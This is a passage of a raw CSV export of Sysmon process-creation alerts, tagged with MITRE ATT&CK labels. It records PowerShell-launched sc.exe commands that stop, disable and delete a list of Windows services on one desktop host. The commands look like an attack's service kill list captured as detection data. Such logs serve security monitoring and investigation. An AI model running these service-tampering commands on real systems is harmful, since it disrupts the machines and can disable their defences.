(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John 
Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.177781100Z"",""eventRecordID"":""2411"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.169\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00108e271e00}\r\nProcessId: 5612\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.169"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00108e271e00}"",""processId"":""5612"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.338",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.108 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00109f241e00} +ProcessId: 2580 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.113548900Z"",""eventRecordID"":""2408"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.108\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00109f241e00}\r\nProcessId: 2580\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.108"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00109f241e00}"",""processId"":""2580"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.275",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.049 
+ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00105c211e00} +ProcessId: 3536 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.053946700Z"",""eventRecordID"":""2405"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.049\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00105c211e00}\r\nProcessId: 3536\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.049"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00105c211e00}"",""processId"":""3536"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:30.260",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.022 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-001002201e00} +ProcessId: 7068 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SRDSL Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.025114600Z"",""eventRecordID"":""2404"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.022\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-001002201e00}\r\nProcessId: 7068\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.022"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-001002201e00}"",""processId"":""7068"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SRDSL Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.231",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.986 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010041e1e00} +ProcessId: 5312 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.988817500Z"",""eventRecordID"":""2402"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.986\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010041e1e00}\r\nProcessId: 5312\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.986"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010041e1e00}"",""processId"":""5312"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.182",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.940 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010691b1e00} +ProcessId: 5308 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.943108700Z"",""eventRecordID"":""2399"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.940\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010691b1e00}\r\nProcessId: 5308\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:01.940"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010691b1e00}"",""processId"":""5308"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.158",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.909 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010bf191e00} +ProcessId: 300 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
